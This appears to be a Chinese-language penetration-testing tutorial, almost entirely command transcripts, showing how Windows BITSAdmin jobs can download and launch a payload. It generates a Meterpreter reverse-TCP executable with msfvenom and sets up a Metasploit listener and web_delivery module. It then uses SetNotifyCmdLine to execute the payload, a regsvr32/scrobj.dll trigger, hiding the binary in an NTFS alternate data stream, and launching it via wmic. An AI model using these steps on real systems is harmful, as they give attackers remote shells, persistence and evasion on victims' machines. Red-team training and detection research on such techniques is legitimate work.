


bitsadmin /transfer hackingarticles C:\Users\snowwolf\Desktop\hello.txt



PS C:\Users\snowwolf\Desktop> bitsadmin /create ghostwolflab

BITSADMIN version 3.0 [ 7.5.7600 ]
BITS administration utility.
(C) Copyright 2000-2006 Microsoft Corp.

BITSAdmin is deprecated and is not guaranteed to be available in future versions of Windows.
Administrative tools for the BITS service are now provided by BITS PowerShell cmdlets.

Created job {6143EB50-0335-46A2-AE74-FE12F01B9FCB}.

然后需要将传输的文件添加到Job中,使用以下命令将C:\Users\snowwolf\win7.txt文件传输到 C:\Users\snowwolf\Desktop\win7.txt:

PS C:\Users\snowwolf\Desktop> bitsadmin /addfile ghostwolflab C:\Users\snowwolf\win7.txt C:\Users\snowwolf\Desktop\win7.txt

BITSADMIN version 3.0 [ 7.5.7600 ]
BITS administration utility.
(C) Copyright 2000-2006 Microsoft Corp.

BITSAdmin is deprecated and is not guaranteed to be available in future versions of Windows.
Administrative tools for the BITS service are now provided by BITS PowerShell cmdlets.

Added C:\Users\snowwolf\win7.txt -> C:\Users\snowwolf\Desktop\win7.txt to job.


PS C:\Users\snowwolf\Desktop> bitsadmin /resume ghostwolflab

BITSADMIN version 3.0 [ 7.5.7600 ]
BITS administration utility.
(C) Copyright 2000-2006 Microsoft Corp.

BITSAdmin is deprecated and is not guaranteed to be available in future versions of Windows.
Administrative tools for the BITS service are now provided by BITS PowerShell cmdlets.

Job resumed.


PS C:\Users\snowwolf\Desktop> bitsadmin /complete ghostwolflab

BITSADMIN version 3.0 [ 7.5.7600 ]
BITS administration utility.
(C) Copyright 2000-2006 Microsoft Corp.

BITSAdmin is deprecated and is not guaranteed to be available in future versions of Windows.
Administrative tools for the BITS service are now provided by BITS PowerShell cmdlets.

Job completed.




随着Windows Server 2016的发布,微软更新了适用于PowerShell的BITSAdmin命令。

Start-BitsTransfer -Source -Destination C:\Users\snowwolf\Desktop\hello.txt



└─# msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT=5555 -f exe > bits.exe
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder specified, outputting raw payload
Payload size: 354 bytes
Final size of exe file: 73802 bytes


msf6 > use exploit/multi/handler 
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set lhost
lhost =>
msf6 exploit(multi/handler) > set lport 5555
lport => 5555
msf6 exploit(multi/handler) > exploit 

[*] Started reverse TCP handler on


PS C:\Users\snowwolf\Desktop> bitsadmin /create ghostwolflab

BITSADMIN version 3.0 [ 7.5.7600 ]
BITS administration utility.
(C) Copyright 2000-2006 Microsoft Corp.

BITSAdmin is deprecated and is not guaranteed to be available in future versions of Windows.
Administrative tools for the BITS service are now provided by BITS PowerShell cmdlets.

Created job {2FD005C1-B95A-4556-9875-14043605D20A}.


PS C:\Users\snowwolf\Desktop> bitsadmin /addfile ghostwolflab C:\Users\snowwolf\Desktop\bits.exe

BITSADMIN version 3.0 [ 7.5.7600 ]
BITS administration utility.
(C) Copyright 2000-2006 Microsoft Corp.

BITSAdmin is deprecated and is not guaranteed to be available in future versions of Windows.
Administrative tools for the BITS service are now provided by BITS PowerShell cmdlets.

Added -> C:\Users\snowwolf\Desktop\bits.exe to job.


PS C:\Users\snowwolf\Desktop> bitsadmin /SetNotifyCmdLine ghostwolflab cmd.exe "/c bitsadmin.exe /complete ghostwolflab | start /B C:\Users\snowwolf\Desktop\bits.exe"

BITSADMIN version 3.0 [ 7.5.7600 ]
BITS administration utility.
(C) Copyright 2000-2006 Microsoft Corp.

BITSAdmin is deprecated and is not guaranteed to be available in future versions of Windows.
Administrative tools for the BITS service are now provided by BITS PowerShell cmdlets.

notification command line set to 'cmd.exe' '/c bitsadmin.exe /complete ghostwolflab | start /B C:\Users\snowwolf\Desktop\bits.exe'.


PS C:\Users\snowwolf\Desktop> bitsadmin /resume ghostwolflab

BITSADMIN version 3.0 [ 7.5.7600 ]
BITS administration utility.
(C) Copyright 2000-2006 Microsoft Corp.

BITSAdmin is deprecated and is not guaranteed to be available in future versions of Windows.
Administrative tools for the BITS service are now provided by BITS PowerShell cmdlets.

Job resumed.



msf6 > use exploit/multi/script/web_delivery 
[*] Using configured payload python/meterpreter/reverse_tcp
msf6 exploit(multi/script/web_delivery) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf6 exploit(multi/script/web_delivery) > set target 3
target => 3
msf6 exploit(multi/script/web_delivery) > set lhost
lhost =>
msf6 exploit(multi/script/web_delivery) > run


# 创建Job
PS C:\Users\snowwolf\Desktop> bitsadmin /create ghostwolflab

BITSADMIN version 3.0 [ 7.5.7600 ]
BITS administration utility.
(C) Copyright 2000-2006 Microsoft Corp.

BITSAdmin is deprecated and is not guaranteed to be available in future versions of Windows.
Administrative tools for the BITS service are now provided by BITS PowerShell cmdlets.

Created job {3B44478B-ABD3-4348-BB35-FC9FE37EDFCC}.
# 传输一个无害化的文本文件
PS C:\Users\snowwolf\Desktop> bitsadmin /addfile ghostwolflab C:\Users\snowwolf\Desktop\hello.txt

BITSADMIN version 3.0 [ 7.5.7600 ]
BITS administration utility.
(C) Copyright 2000-2006 Microsoft Corp.

BITSAdmin is deprecated and is not guaranteed to be available in future versions of Windows.
Administrative tools for the BITS service are now provided by BITS PowerShell cmdlets.

Added -> C:\Users\snowwolf\Desktop\hello.txt to job.


PS C:\Users\snowwolf\Desktop> bitsadmin /SetNotifyCmdLine ghostwolflab regsvr32 "/s /n /u /i: scrobj.dll"

BITSADMIN version 3.0 [ 7.5.7600 ]
BITS administration utility.
(C) Copyright 2000-2006 Microsoft Corp.

BITSAdmin is deprecated and is not guaranteed to be available in future versions of Windows.
Administrative tools for the BITS service are now provided by BITS PowerShell cmdlets.

notification command line set to 'regsvr32' '/s /n /u /i: scrobj.dll'.


PS C:\Users\snowwolf\Desktop> bitsadmin /resume ghostwolflab

BITSADMIN version 3.0 [ 7.5.7600 ]
BITS administration utility.
(C) Copyright 2000-2006 Microsoft Corp.

BITSAdmin is deprecated and is not guaranteed to be available in future versions of Windows.
Administrative tools for the BITS service are now provided by BITS PowerShell cmdlets.

Job resumed.




PS C:\Users\snowwolf\Desktop> bitsadmin /create ghostwolflab

BITSADMIN version 3.0 [ 7.5.7600 ]
BITS administration utility.
(C) Copyright 2000-2006 Microsoft Corp.

BITSAdmin is deprecated and is not guaranteed to be available in future versions of Windows.
Administrative tools for the BITS service are now provided by BITS PowerShell cmdlets.

Created job {CB5F142D-C22D-487F-AC4D-1E158130927C}.

PS C:\Users\snowwolf\Desktop> bitsadmin /addfile ghostwolflab C:\Users\snowwolf\Desktop\bits.exe

BITSADMIN version 3.0 [ 7.5.7600 ]
BITS administration utility.
(C) Copyright 2000-2006 Microsoft Corp.

BITSAdmin is deprecated and is not guaranteed to be available in future versions of Windows.
Administrative tools for the BITS service are now provided by BITS PowerShell cmdlets.

Added -> C:\Users\snowwolf\Desktop\bits.exe to job.


PS C:\Users\snowwolf\Desktop> bitsadmin /SetNotifyCmdLine ghostwolflab cmd.exe "/c type C:\Users\snowwolf\Desktop\bits.exe > C:\Users\snowwolf\Desktop\bits.txt:bits.exe"

BITSADMIN version 3.0 [ 7.5.7600 ]
BITS administration utility.
(C) Copyright 2000-2006 Microsoft Corp.

BITSAdmin is deprecated and is not guaranteed to be available in future versions of Windows.
Administrative tools for the BITS service are now provided by BITS PowerShell cmdlets.

notification command line set to 'cmd.exe' '/c type C:\Users\snowwolf\Desktop\bits.exe > C:\Users\snowwolf\Desktop\bits.txt:bits.exe'.


PS C:\Users\snowwolf\Desktop> bitsadmin /resume ghostwolflab

BITSADMIN version 3.0 [ 7.5.7600 ]
BITS administration utility.
(C) Copyright 2000-2006 Microsoft Corp.

BITSAdmin is deprecated and is not guaranteed to be available in future versions of Windows.
Administrative tools for the BITS service are now provided by BITS PowerShell cmdlets.

Job resumed.


PS C:\Users\snowwolf\Desktop> wmic process call create .\bits.exe
 Executing (Win32_Process)->Create()
Method execution successful.
Out Parameters:
instance of __PARAMETERS
        ReturnValue = 9;